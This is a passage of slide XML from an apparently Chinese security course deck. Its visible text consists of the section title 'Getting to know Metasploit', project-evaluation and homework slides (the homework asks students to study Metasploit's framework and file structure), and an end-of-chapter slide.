                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>教师综合评价</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="文本框 577"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="5210848"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目评价】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="矩形 23"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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25" name="矩形 24"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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26" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.1 认识Metasploit</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="9" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="13" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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 name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【作业布置】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649605" y="1952625"/>
            <a:ext cx="9040495" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="742950" indent="-742950" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>了解Metasploit框架结构和文件结构</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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7" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.1 认识Metasploit</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide1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TextBox 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1354455" y="2427605"/>
            <a:ext cx="9048750" cy="7385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spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" spc="-300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="LilyUPC" panose="020B0604020202020204" pitchFamily="34" charset="-34"/>
                <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>本章内容结束</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" spc="-300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="LilyUPC" panose="020B0604020202020204" pitchFamily="34" charset="-34"/>
              <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9500870" y="5334000"/>
            <a:ext cx="2261870" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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8" presetClass="entr" presetSubtype="0" accel="50000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="50000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="-45.0"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="114"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="-45"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="69900">
                                          <p:val>
                                            <p:fltVal val="45"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="39" decel="50000" autoRev="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="114"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="34" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="216"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>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 grpId="0"/>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等腰三角形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-354902" y="1593655"/>
            <a:ext cx="2812747" cy="2101740"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3859264" y="2678072"/>
            <a:ext cx="5245100" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
